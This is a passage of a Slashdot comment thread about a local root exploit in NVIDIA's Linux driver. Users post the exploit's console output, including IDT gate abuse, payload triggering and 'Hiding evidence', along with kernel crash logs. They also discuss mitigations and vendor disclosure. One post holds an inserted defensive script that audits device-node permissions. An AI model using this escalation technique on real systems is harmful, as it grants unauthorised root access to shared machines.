      me@mine:~$ rpm -qa | grep -i nvidia
      nvidia-computeG02-295.49-17.1.x86_64
      x11-video-nvidiaG02-295.49-17.1.x86_64
      nvidia-gfxG02-kmp-desktop-295.49_k3.1.0_1.2-16.1.x86_64

    3. Re:works here by Ken_g6 · · Score: 3, Interesting

      Doesn't work for me on Linux Mint Debian Edition with Xfce, nVidia driver version x86_64-290.10:

      uname -a | sed -e 's/^[^0-9]*//'
      3.2.0-2-amd64 #1 SMP Sun Mar 4 22:48:17 UTC 2012 x86_64 GNU/Linux

      lsb_release -a
      LSB Version: core-2.0-amd64:core-2.0-noarch:core-3.0-amd64:core-3.0-noarch:core-3.1-amd64:core-3.1-noarch:core-3.2-amd64:core-3.2-noarch
      Distributor ID: LinuxMint
      Description: Linux Mint Xfce Edition
      Release: 1
      Codename: debian

      ./nvid-root
      [*] IDT offset at 0xffffffff8172a000
      [*] Abusing nVidia...
      [*] CVE-2012-YYYY
      [*] 64-bits Kernel found at ofs 0
      [*] Using IDT entry: 220 (0xffffffff8172adc0)
      [*] Enhancing gate entry...
      [*] Triggering payload...
      Killed

      Message from syslogd@qcomp at Aug 1 12:30:52 ...
        kernel:[148805.500504] Oops: 0000 [#1] SMP

      Message from syslogd@qcomp at Aug 1 12:30:52 ...
        kernel:[148805.500641] Stack:

      Message from syslogd@qcomp at Aug 1 12:30:52 ...
        kernel:[148805.500658] Call Trace:

      Message from syslogd@qcomp at Aug 1 12:30:52 ...
        kernel:[148805.500675] Code: Bad RIP value.

      Message from syslogd@qcomp at Aug 1 12:30:52 ...
        kernel:[148805.500684] CR2: ffffffff81a00000

      --
      (T>t && O(n)--) == sqrt(666)
    4. Re:works here by Anonymous Coward · · Score: 0

      Does it open any sort of "hole" that "bad guys" could use remotely, or do they need to have physical control of the computer to use this exploit?

    5. Re:works here by Anonymous Coward · · Score: 0

      // This should probably work for 64-bits and 32-bits kernels
      // But only tested on 64-bits kernels
      inline static long init_kallsyms(struct kallsyms *ks) ...

      Funny thing from the code: they say they tested it on 64 bit kernels but it *should* work on 32 bit, but from the above posts, it didn't work on two 64 bit kernels but did work on the 32 bit.

    6. Re:works here by TuxThePenguin2205 · · Score: 1

      Kinda works for me. Got root on Gentoo box. Then everything stopped working within a couple of seconds. Any programs started were auto-killed and all networking stopped dead. I saw a kernel oops in the kernel ring log. A reboot was required to do anything useful.

      Linux mysystem 3.2.12-gentoo #1 SMP PREEMPT Mon Mar 26 12:55:47 BST 2012 x86_64 Intel(R) Core(TM) i7 CPU 970 @ 3.20GHz GenuineIntel GNU/Linux
      NVRM version: NVIDIA UNIX x86_64 Kernel Module 295.59 Wed Jun 6 21:19:40 PDT 2012

    7. Re:works here by Anonymous Coward · · Score: 0

      Generically speaking this is local only; they would have to have a shell account to use the code as is. Of course, the guts of it could be included in any software you might download, and that software could be running as your user id, escalate itself to root privs, and then open itself to the outside world. This is why trust is important with regards to repositories and the like.

      Consider how many places on the net say to do task xyz, add this line to your apt-sources and then install via apt-get install. How well do you trust those repositories that are not hugely community reviewed? // captcha is mischief, hah

    8. Re:works here by MikeBabcock · · Score: 1

      One wonders if it's possible to block this with SELinux.

      --
      - Michael T. Babcock (Yes, I blog)
    9. Re:works here by digitalaudiorock · · Score: 1

      Didn't work on either of my 32 bit Gentoo machines. One with an old card that requires nvidia-drivers-96.43.20:

      ./nvid-root
      [*] IDT offset at 0xc13fe000
      [*] Abusing nVidia...

      (just ended there)... and one with nvidia-drivers-295.49:

      ./nvid-root
      [*] IDT offset at 0xc13d4000
      [*] Abusing nVidia...
      [*] CVE-2012-YYYY
      [*] 32-bits Kernel found at ofs 0
      [*] Using IDT entry: 220 (0xc13d46e0)
      [*] Enhancing gate entry...
      [*] Triggering payload...
      [*] Hiding evidence...
      callsetroot returned fffffffb (-5)
      [*] Failed to get root.

    10. Re:works here by fnj · · Score: 2, Insightful

      Why not; SELinux certainly has no problem blocking anything useful from working.

    11. Re:works here by Tapewolf · · Score: 1

      Worked on mine with a custom 3.4 kernel (on AMD64) and with Nvidia 304.22. I'm going to upgrade to 3.5 and see if that makes any difference. Unsurprisingly, but annoyingly, it's knackered VGA mode so I can't switch back to the VTs.

    12. Re:works here by Anonymous Coward · · Score: 0

      Looks like it partially works if it can cause kernel oops. Correct me if I'm wrong but normal applications shouldn't be able to do that.
      Your architecture and/or kernel version is not properly supported in exploit, that's all.

      I'm getting the same result on my gentoo (kernel 3.5.0, nvidia 302.17).

    13. Re:works here by sjames · · Score: 1

      Only if you use it to deny all access to the device. But you can do that with rmmod too.

    14. Re:works here by Anonymous Coward · · Score: 0

      It is possible to block it with a hardened kernel. SELinux will not block this, but Pax and GRSecurity both do...

      GRSecurity can be set up to panic the system when an attempt like this is made, and pax doesn't allow it to happen at all.

      The best of course is if you build it with stack smashing protection on, which will also cause it to throw and log.

      SELinux is garbage for root exploits; it's only useful for preventing damage from other exploits.

    15. Re:works here by Anonymous Coward · · Score: 0

      Doesn't work here with OpenSUSE 12.1 (64-bit kernel 3.1.10, with 295.49 nvidia driver).
      I guess it only works with recent drivers.

  8. Re:Who did he send it to at Nvidia? by Anonymous Coward · · Score: 0

    I read that as "So no one at Nvidia could be bothered to spend 15 minutes and check out the evidence of a reported exploit."

  9. Re:Who did he send it to at Nvidia? by nedlohs · · Score: 5, Informative

    Yeah you don't get more flimsy evidence than a working exploit.

  10. Again? by Anonymous Coward · · Score: 0

    This isn't the first time that the Nvidia driver has had serious security vulnerabilities. It also happened in 2006:

    http://phoronix.com/scan.php?page=news_item&px=Mjk5Nw

    1. Re:Again? by Anonymous Coward · · Score: 1

      You mean six years ago they also had a vulnerability? In the modern world we live, that sounds like a ringing fucking endorsement. With companies like Microsoft, you need only say something like, "last Tuesday." Doesn't sound like a bad track record to me.

    2. Re:Again? by TheRaven64 · · Score: 2

      They have security vulnerabilities fairly regularly. Ones that are remotely exploitable are rarer, but the cited one from the grandparent was first known in 2004, not fixed until 2006, and allowed anyone who could make you display an image (e.g. in a web page) to run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

      --
      I am TheRaven on Soylent News
    3. Re:Again? by Anonymous Coward · · Score: 0

      the cited one from the grandparent was first known in 2004, not fixed until 2006

      Not true. The advisory writer confused an X server bug (also exploitable!) from 2004 with the nVidia one from 2006. http://nvidia.custhelp.com/app/answers/detail/a_id/1971/~/linux---how-does-the-rapid7-advisory-r7-0025-affect-the-nvidia-unix-driver

      and allowed anyone who could make you display an image (e.g. in a web page) to run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

      Also not true. It required carefully-crafted fonts and let you run code in the X server (which usually runs as root, but doesn't have to).

  11. Re:Who did he send it to at Nvidia? by ZeroSumHappiness · · Score: 4, Interesting

    If you're not surprised then I hope it's because you expect Nvidia to be shite. Microsoft, as policy (though possibly not practice), fully evaluates any possible security exploits submitted because they assume that among the cranks who've already broken through the airlock there might be a real security exploit. This is expensive but necessary. If Nvidia can't do the same then I'll have to seriously consider my choices next time I'm buying a card.

  12. I'll take my chances by Anonymous Coward · · Score: 0

    People don't buy HD cards to get tearing, pixelated images and laggy playback using shitty opensource drivers.

    But before the zealots complain about closed drivers, they might try coming up with some decent opensource A/V players that are fully featured and actually work.

    Not to mention, for years zealots have been deriding ATI cards, then I finally switch, and Linus gets a hardon for nvidia.

    1. Re:I'll take my chances by konaya · · Score: 2

      Or better yet: nVidia could actually make their driver open source. That way, we'll have all the bells and whistles, and when a security flaw gets known the community can patch it without nVidia's involvement.

    2. Re:I'll take my chances by Anonymous Coward · · Score: 0

      Two things:

      1. Everybody who knows enough about the guts of nVidia hardware to write HW accelerated drivers for it is employed by nVidia already

      2. There are probably huge patent, trade secret and NDA issues even if they wanted to release the source.

      Also, http://xkcd.com/619/

    3. Re:I'll take my chances by Desler · · Score: 2

      So you're going to foot the legal bills for auditing all the source for copyrights and patents, plus pay for all the costs associated with rewriting any and all licensed code that won't be allowed to be open sourced, and finally finance all the extra work needed to make it into mainline? You realize it's not as simple for NVIDIA as creating a public git repo and uploading the source code, right?

    4. Re:I'll take my chances by Anonymous Coward · · Score: 0

      That's because on Linux, you have exactly one option - NVIDIA. Period.

      You have ATI and their shitty binary blob. You have ATI and their epically shitty open source driver. You have Intel which has really nice drivers but the hardware simply isn't comparable. And then you have NVIDIA which supported Linux a full decade before ATI. And generally, their drivers not only work, but work really well.

      None of that means NVIDIA is perfect. In fact, anyone who says NVIDIA is perfect, I'll happily give them a mirror so they know what an idiot looks like. Just the same, for 3D on Linux, you still have only one option. And frankly, it's still pretty damn good, albeit not perfect.

    5. Re:I'll take my chances by Anonymous Coward · · Score: 0

      (undo moderation misclick)

  13. good thing by slashmydots · · Score: 1

    Good thing all the outside the box type virus writers are busy writing malware for Macs so they don't have time to focus on Linux lol.

  14. Re:Who did he send it to at Nvidia? by Anonymous Coward · · Score: 1

    /steps on the soap box. Heh, Microsoft the one with the most security holes of the bunch and you are throwing these statements around? They have holes from years ago that they haven't fixed and just come back with the "upgrade your OS" line of B.S. And UAC is supposed to make Windows Vista/7 secure, that is a joke.

    I fully understand that it takes a while for companies to stamp out bugs but I think companies have become far too lax on their bug squashing. The people that buy their products become their beta testers and this to me is just wrong. I do software testing and I know from 20 yrs of testing that companies will downgrade bugs even if they are considered critical by the testers just to get a product out the door on time. They will then try to minimize the damage until they can put out the next version with a hopeful fix in them.

    I think we need to make some of these companies responsible for their horrible code and lack of testing. /steps off the soap box

  15. meh by ThorGod · · Score: 4, Interesting

    Not too long ago Intel had a firmware exploit in their processors.

    I still appreciate the effort Nvidia's made to support their cards on OSes such as Linux and BSD over the years. I'll still only EVER buy nvidia cards because of their driver support.

    Here's hoping they keep trucking along at it, even with what Linus said and now this.

    --
    PS: I don't reply to ACs.
    1. Re:meh by John+Hasler · · Score: 1

      I bought one Nvidia card because of their wonderful Linux support. I'll never buy another.

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
    2. Re:meh by interval1066 · · Score: 1

      Um... Intel...? Just sayin', nVidia isn't your only choice for Linux support.

      --
      Python: 'And then suddenly you have a language which says "we're all stuck with whatever the whiniest coder wants".'
    3. Re:meh by Anonymous Coward · · Score: 0

      I never bought a graphics card. Should I have?

    4. Re:meh by MikeBabcock · · Score: 1

      Okay, Intel makes drivers. What they don't make is video cards that work worth a damn.

      He meant to say, "of the video cards that can play games with decent frame rates, NVidia has the best drivers on Linux."

      --
      - Michael T. Babcock (Yes, I blog)
    5. Re:meh by gman003 · · Score: 1

      Even if you've never bought a discrete card, you've used one, integrated either onto the motherboard, into the northbridge, or on the processor itself.

      One of my earliest computers had an ATI Rage 3D right on the motherboard. Later, I used one with an nVidia chipset, which had (I believe) a 7000-series GPU integrated with the northbridge. My current laptop has an Intel GPU right on the processor (it also has a discrete nVidia card). Unless your computer literally does not have any video capability, it has some sort of graphics "system". Quite possibly an Nvidia chip (they're the largest, followed by AMD, Intel, PowerVR, and a few others (I think Matrox is still around)).

    6. Re:meh by Anonymous Coward · · Score: 0

      No. Discrete graphics cards are for bird brains.

    7. Re:meh by Anonymous Coward · · Score: 0

      Go Intel. I'll never return to nVidia or ATI. Intel's graphics are actually comparable now to the low end nVidia. Plus Intel's cards support video. It's not all better in nVidia land. Intel's drivers are completely free, unlike nVidia and ATI who work against free software. AMD only releases a partial driver. It doesn't even partially work without the non-free component.

    8. Re:meh by Desler · · Score: 1

      If it's integrated into the motherboard or the north bridge or the processor it is not a 'discrete' card. A discrete card implies it is NOT integrated into anything.

    9. Re:meh by oudzeeman · · Score: 1

      That's what he is saying. Even if you haven't bought a discrete card, you've still bought a video card (that was integrated into your motherboard).

    10. Re:meh by gman003 · · Score: 1

      And most importantly, you've used drivers for that graphics processor. Which could be exploited like this one.

    11. Re:meh by Anonymous Coward · · Score: 1

      Yeah I believe what he meant was that it's the only GOOD option. AMD/ATI's drivers have always been shit and Intel isn't good for much more than web-browsing and hi-def Youtube videos.

    12. Re:meh by Anonymous Coward · · Score: 0

      Not necessarily. Though not all PC BIOSes will boot without a graphics card (onboard or not), if you have one that will, there's still the option of a serial console, or even a pure network server.

      Real(tm) servers used to have serial console only.

  16. privilege escalation hole? by paxprobellum · · Score: 1

    "privilege escalation hole" sounds like something after "friends with benefits". Just saying.

  17. For limited values of "you" by Anonymous Coward · · Score: 4, Funny

    It needs a local execution method (either another exploit or a tricked user) and access to /dev/nvidia0.

    So, for example, even if you exploit a web service to execute this on a suitable machine, you still won't get anything as long as web service's user doesn't have permissions on /dev/nvidia0.

    Worst of all, it still needs downloading and compiling sources. WTF, Linux? When are we going to get all the software available prepackaged and regularly updated from the repository? Other OSes handle it well, no need for "wget && patch && gcc" to get this working, no need for sudo and sometimes even no need for any actions from user AT ALL, simply visit a page and it just works!
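A defender-side check for the precondition this post names (a local account that can open /dev/nvidia0), added here as an example and not part of the thread. It works from constructed stand-ins for `stat -c '%a %U %G %n' /dev/nvidia*` output and an /etc/group excerpt, and treats supplementary group membership only (users whose primary gid is the group are an assumed simplification, noted in the code).

```python
"""Audit which accounts can open the NVIDIA device nodes read/write.

The exploit in this thread is local and needs an open handle on
/dev/nvidia0, so the useful question for a defender is: which accounts
on this host can open it at all?  All sample data below is constructed.
"""
import stat

# Constructed sample: what `stat -c '%a %U %G %n' /dev/nvidia*` might print.
SAMPLE_STAT = """\
666 root root /dev/nvidia0
660 root video /dev/nvidia1
666 root root /dev/nvidiactl
"""

# Constructed /etc/group excerpt (name:passwd:gid:member,member).
SAMPLE_GROUP = """\
root:x:0:
video:x:44:alice,bob
audio:x:29:alice
"""

# Constructed account list (on a real host, read it from /etc/passwd).
SAMPLE_USERS = {"root", "alice", "bob", "www-data"}


def parse_group(text):
    """Map group name -> set of supplementary members listed in /etc/group.

    Assumption/simplification: accounts whose *primary* gid is the group are
    not listed in /etc/group and would need a /etc/passwd lookup as well.
    """
    members = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, _gid, mem = line.split(":", 3)
        members[name] = {m for m in mem.split(",") if m}
    return members


def users_with_rw(mode_octal, owner, group, group_db, all_users):
    """Accounts that can open the node read/write under plain DAC bits.

    root is always included because CAP_DAC_OVERRIDE bypasses mode bits.
    """
    mode = int(mode_octal, 8)
    if mode & stat.S_IROTH and mode & stat.S_IWOTH:
        return set(all_users)  # world rw: every account on the host qualifies
    users = {"root"}
    if mode & stat.S_IRUSR and mode & stat.S_IWUSR:
        users.add(owner)
    if mode & stat.S_IRGRP and mode & stat.S_IWGRP:
        users |= group_db.get(group, set())
    return users


def audit(stat_text, group_text, all_users):
    """Return {device path: sorted list of accounts that can open it rw}."""
    group_db = parse_group(group_text)
    report = {}
    for line in stat_text.splitlines():
        if not line.strip():
            continue
        mode, owner, group, path = line.split(None, 3)
        report[path] = sorted(users_with_rw(mode, owner, group, group_db, all_users))
    return report


def world_rw_nodes(stat_text):
    """Paths whose mode grants read+write to 'other'; these are the ones to tighten."""
    hits = []
    for line in stat_text.splitlines():
        if not line.strip():
            continue
        mode, _owner, _group, path = line.split(None, 3)
        m = int(mode, 8)
        if m & stat.S_IROTH and m & stat.S_IWOTH:
            hits.append(path)
    return hits


if __name__ == "__main__":
    for path, users in audit(SAMPLE_STAT, SAMPLE_GROUP, SAMPLE_USERS).items():
        print(f"{path}: {', '.join(users)}")
    print("world rw:", world_rw_nodes(SAMPLE_STAT))
```

In the constructed sample, /dev/nvidia1 is reachable only by root and the video group, while the 0666 nodes are reachable by every account, including the web service user the post mentions.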

    1. Re:For limited values of "you" by Nerdfest · · Score: 4, Insightful

      When are we going to get all the software available prepackaged and regularly updated from the repository?

      That's a fairly half-hearted troll. Most Linux distros have package management and multi-source software repositories that make iOS, Metro, and OS X look like the limited attempts at platform lock-in that they really are.

    2. Re:For limited values of "you" by Anonymous Coward · · Score: 0

      Exactly. I'm rather hard pressed to think of a distro that *doesn't* have some form of package repo that would make Windows package management cry, aside from extremely specialized distros, of course. (Captcha: Applaud)

    3. Re:For limited values of "you" by Bert64 · · Score: 2

      Well, the presence of a local escalation hole makes other vulnerabilities more serious... Just some of the possible scenarios:

      An HPC cluster with multiple non-root users: any of them could exploit this to get root...
      Someone using Linux as a workstation, exploited via a userland hole (e.g. a browser bug): this nullifies the advantage of running as an unprivileged user.

      Sure it's not as serious as a remote root hole, but it can still be a useful hole for a hacker.

      --
      http://spamdecoy.net - free throwaway anonymous email - avoid spam!
    4. Re:For limited values of "you" by Anonymous Coward · · Score: 0

      Don't worry, there are enough exploits in games, which will have access to /dev/nvidia0 (for OpenGL DRI to work), that it won't be a problem getting an attack platform. And with Steam being ported to Lunix, hundreds more exploit vectors will soon be available.

  18. Re: by Fwipp · · Score: 1

    Especially if you're referring to a Pinto.

  19. Re:Who did he send it to at Nvidia? by ZeroSumHappiness · · Score: 2

    I didn't say Windows was perfect, just that if you send a (crank) security exploit to Microsoft they review it. They may not fix it. They may say the best that you can do is upgrade, but they know whether or not it's a real hole. (At least, that's the policy.)

  20. Won't work on 64 bit by Anonymous Coward · · Score: 0

    [*] IDT offset at 0xffffffff81962000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 64-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xffffffff81962dc0)
    [*] Enhancing gate entry...
    [ ] Failed!

  21. So who here runs a secure X11 with any driver? by Anonymous Coward · · Score: 1

    X11 has NEVER been secure; it's ridiculous to try and point the finger at Nvidia, and this is why they have not cared for a month. It's a favorite interview question I use on *NIX applicants: "So tell me, how do you secure X11?". Usually this question gets some laughs and is a nice way to break the ice. Seriously though, what is the alternative here? The Ford Escape catches on fire, but would you turn down a Ford GT? Probably not, and the same goes for graphics acceleration: are you going to turn down that fire-breathing graphics card in your hot little hands? Probably not. If someone gets into your X11 box at that level there is a problem with your network, not the Linux box.

    1. Re:So who here runs a secure X11 with any driver? by PenquinCoder · · Score: 1

      "So tell me, how do you secure X11?"

      Get rid of it. Use Wayland.

    2. Re:So who here runs a secure X11 with any driver? by serviscope_minor · · Score: 1

      Get rid of it. Use Wayland.

      I really hope you are joking. Please tell me you do not seriously believe this...

      --
      SJW n. One who posts facts.
    3. Re:So who here runs a secure X11 with any driver? by ThorGod · · Score: 1

      X11 has NEVER been secure; it's ridiculous to try and point the finger at Nvidia, and this is why they have not cared for a month.

      I probably knew this at some point. Sounds like a good reason to keep X11 off of your servers, and have X11 only on your workstations. (What would be a reason to have a gui on a unix server..I don't know.)

      --
      PS: I don't reply to ACs.
    4. Re:So who here runs a secure X11 with any driver? by serviscope_minor · · Score: 1

      (What would be a reason to have a gui on a unix server..I don't know.)

      As someone inexperienced in such matters installing a complex network configuration (for me) involving multiple cards, bonded links and a private subnet on one end, the third time I lost network connectivity due to some mistake, I decided it was easiest to install a GUI on the machine and configure it locally.

      --
      SJW n. One who posts facts.
  22. One of many by jandrese · · Score: 4, Insightful

    The graphics driver is both monstrously large and operates at a very low level; there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmack put it: I agree with Microsoft's assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security.

    --
    I read the internet for the articles.
  23. Only a month notice? by gr8_phk · · Score: 1

    It appears that this has been known to Nvidia for at least a month.

    At normal software companies this would probably go through a process like:
    1) Confirmation of the problem
    2) Determine severity
    3) Assign a release to fix it by
    4) Have someone fix it
    5) Verify the fix
    6) Ship it with the next release
    In addition, one may want to look around for related problems and fix those too. Since it is a security issue, I would hope that a fix makes it into the next driver release AFTER the one that is in process. Or perhaps hurried into the one that is in process if it won't delay too long. I don't think a month is really that long for a company that size to go without a fix. Upon reading the summary I honestly thought the last word was going to be "year" not "month", in which case a fix would be long overdue.

    1. Re:Only a month notice? by FranTaylor · · Score: 1

      The process you describe can be done in a week; it sure doesn't take a month.

      Nvidia has released on a week's notice in the past.

    2. Re:Only a month notice? by Anonymous Coward · · Score: 0

      Depending on the specific details of a particular bug, step 2 can take from moments to days, and steps 4 & 5 can take anywhere from minutes to weeks.

      I make no claims as to the timelines involved in this particular instance, except to say that if you're going to claim it "can be done in a week", you'll need to be able to cite some evidence to support it.

    3. Re:Only a month notice? by Anonymous Coward · · Score: 0

      Yes, but doesn't it kind of depend on the level of work required to implement a fix? A month is not much time to troubleshoot something that is highly complicated.

  24. Use Windows (Sore:200,000, Parent is an Amature) by Anonymous Coward · · Score: 0, Funny

    Pssst..... Amature.

    CAPTCHA = muddlers

  25. It might have been patched already... by tlambert · · Score: 1

    I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

    Sure, it'd be patched, and you could probably apply the patch locally, but it wouldn't be in the official repository yet. And then you get to wait for the review process, where someone tells you how they would have done it differently, if they only had the time or the interest, but since you didn't do it that way, you need to rewrite your patch. This is pretty much true of most Open Source communities, which tend not to take rough consensus and working code, and then clean up the cosmetic stuff later.

    Then you get to wait for it to move from "development" to "beta" to "stable" before it actually makes it into an official release version. In most Open Source communities, this whole thing can take months.

    In general, I'd have to say Open Source doesn't win over closed in this case, and I say that as a long time Open Source person.

    1. Re:It might have been patched already... by Anonymous Coward · · Score: 0

      For an open source person you know quite little of security bug fixing processes.

      Fixing, testing and delivering non-trivial bugs can take weeks. However, the things you mentioned as hindrances don't really come into play for security fixes at all, not in any project I've worked in.

      Maybe we could concentrate on actual problems instead of making shit up.

    2. Re:It might have been patched already... by bill_mcgonigle · · Score: 1

      In most Open Source communities, this whole thing can take months.

      Go ahead and look up a bug report for any recent vulnerability in a major Linux distribution and you'll see this isn't true. Most critical security bugs get pushed to stable within a few days, perhaps a week, of being publicly announced.

      Now, it is true that often they sit on private disclosure bugs until a CVE or public exploit is made available. That's poor resource allocation, IMO, but fixes for wild exploits simply aren't something that people fight over.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
    3. Re:It might have been patched already... by tlambert · · Score: 1

      Sorry, but getting a fix into a stable source tree, and getting it installed on systems are two very different things. Chrome OS does a pretty decent job of this, but unless you are talking about a commercially backed Open Source OS distribution with automatic updates, most systems sit there with vulnerable software for years before they are updated/reinstalled/retired.

      This is exactly the same as the situation in the closed source community.

    4. Re:It might have been patched already... by bill_mcgonigle · · Score: 1

      but unless you are talking about a commercially backed Open Source OS distribution with automatic updates, most systems

      Yes, that's what most people run. Last measure I saw, Ubuntu + Fedora made up about 50%, SUSE 10%, Gentoo about 10% (OK, not commercial, but very fast with automatic updates) and then Debian and all the others the last quarter or so.

      So your complaint is that the last 15% or so where they don't have an update engine don't get updates? Or that Debian has a slow process? Trying to understand ...

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
  26. Is this vulnerability remotely exploitable? by Anonymous Coward · · Score: 0

    I guess this is the most important question, otherwise users shouldn't worry about it. Does anybody know?

  27. Re:Use Windows (Sore:200,000, Parent is an Amature by Anonymous Coward · · Score: 0

    He may indeed be an amateur, but at least he didn't misspell anything, let alone a ridiculously common and simple word.

  28. distro wars or idiot vs adept. by OrangeTide · · Score: 1

    If people keep insisting on abusing their watered down idiot's distro, then crying when it doesn't work, we're going to keep telling them to use the right tool for the job!

    --
    “Common sense is not so common.” — Voltaire
    1. Re:distro wars or idiot vs adept. by Interfacer · · Score: 1

      Is it really too much to ask that a basic piece of hardware is supported at a basic level, by a mainstream distro?
      I'm not even talking about 3D acceleration or complex setups. The guy was trying to configure a basic desktop.

      Why should something like screen resolution and basic display functionality still require tinkering and a different configuration that is different between distros?
      Don't go off on the user and his 'crying when his idiot distro doesn't work'. It's 2012. If distros still can't agree on a standard way to do trivial things like that, something is wrong, and it's not the user.

    2. Re:distro wars or idiot vs adept. by OrangeTide · · Score: 2

      Some distros try to simplify things for the user, but get it wrong. Feel free to complain to Canonical. They are the ones trying to beat a new path away from the rest of us. This stuff Just Works on Debian, the closest thing to Ubuntu.

      ps - is a PC assembled from parts from 30+ vendors and at least 4 different firmware vendors really "a basic piece of hardware" ?

      --
      “Common sense is not so common.” — Voltaire
  29. Nope by FranTaylor · · Score: 2

    TwinView doesn't work in nouveau

    1. Re:Nope by hobarrera · · Score: 1

      TwinView is the name of nvidia's implementation of multimonitor support.
      If you need multiple monitors, nouveau supports this.

      Anyway, my point was that users needing monochrome/EGA/CGA have no need for nvidia's binary blob.

    2. Re:Nope by nullchar · · Score: 2

      Correct, as TwinView is proprietary nvidia, but Xinerama should work fine.

  30. Put the whole driver on the video card! by FranTaylor · · Score: 3, Interesting

    There's plenty of horsepower on the card

    Platform-agnostic api, super-duper-thin wrapper libraries

    It also solves all the whinging about binary blobs

  31. Should probably post to the support foru- oh, wait by ExecutorElassus · · Score: 2

    Perhaps not entirely coincidentally, "one month" is about the amount of time that nVidia's web forum - comically also the only route for reporting bugs, and found here - has been shut down due to a DDoS attack.

    Probably not the best way to follow up their snippy response to Linus Torvalds bashing their Linux support.

  32. Re:Who did he send it to at Nvidia? by RedDeadThumb · · Score: 3, Informative

    Amen! I had a hell of a time trying to report a bug in the ATI driver as well. And how do you report a bug to netflix? All company web front pages should have a big button that says "report bug". People are out here doing free QA for them and they aren't taking advantage. Plus I actually get pissed when I cannot report a bug. And I know I am not alone here, so it is bad PR.

  33. They never even replied. by pavon · · Score: 2

    Yeah, one month can be pretty short notice to actually fix, test, and release some more complicated bugs. But in this case, Nvidia never even responded to people who notified them of the exploit. If I reported a security hole and they acknowledged it and let me know they were working on fixing it, then I would give them far more than a month to fix it. But if they just ignored me, then I'd release it after a month too.

  34. Other graphics issues by Penurious+Penguin · · Score: 1

    There has been a mysterious bug causing total system freezes for many thousands of Mint users. A lot were attributed to Muffin/Cinnamon and allegedly solved for those particular users, but many others (like me, using Mate) seem to be graphics related and they persist. After updating to kernel 3.3.6 from 3.2.6, the issue seemed to go away. But after upgrading to 3.4.6-generic, it seems it may be back. The only thing close to a consensus is that it is graphics related. Many report that disabling nvidia drivers solves the issue, but my intel is affected too. I am not savvy enough to know, but whatever the hell is going on, it's pretty bad. Having your system completely crash every other hour is a genuinely terrible bug, or suite of them.

    --
    Forward! -- Emperor Norton, 2012
  35. Ubuntu 12 by phorm · · Score: 1

    Don't have a problem with ubuntu in general, but migration to 12.04 is kinda sucky.
    I prefer to keep my homedir in a separate partition for upgrades like this. That way I can add the new OS on another partition, install, and see how scary the update is...

  36. RMS & Linus agree! by Anonymous Coward · · Score: 0

    Down with proprietary drivers!

  37. Whooosh... by Anonymous Coward · · Score: 0

    ... is the sound of status messages flying by on the terminal as I run "apt-get install nvidia-cve-2012-xxxx-exploit-base nvidia-cve-2012-xxxx-exploit-rootshell"

  38. Re:Who did he send it to at Nvidia? by FormOfActionBanana · · Score: 1

    There is a good broker service for this. Tipping Point's Zero day initiative. Register, submit your vulnerability, they research it, contact the vendor, and pay you for your 0day finding.

    --
    Take off every 'sig' !!
  39. Re:Who did he send it to at Nvidia? by Anonymous Coward · · Score: 0

    (Posting anonymous blabla but I work for one of the better known companies that have had their fair share of humiliating public abuse of exploits)

    If someone, anyone, tags me anywhere in any communication platform I use notifying me of a security problem I consider it to be my job to pass it on to the relevant person(s) on the inside. And I'm a manager even, not a software dev.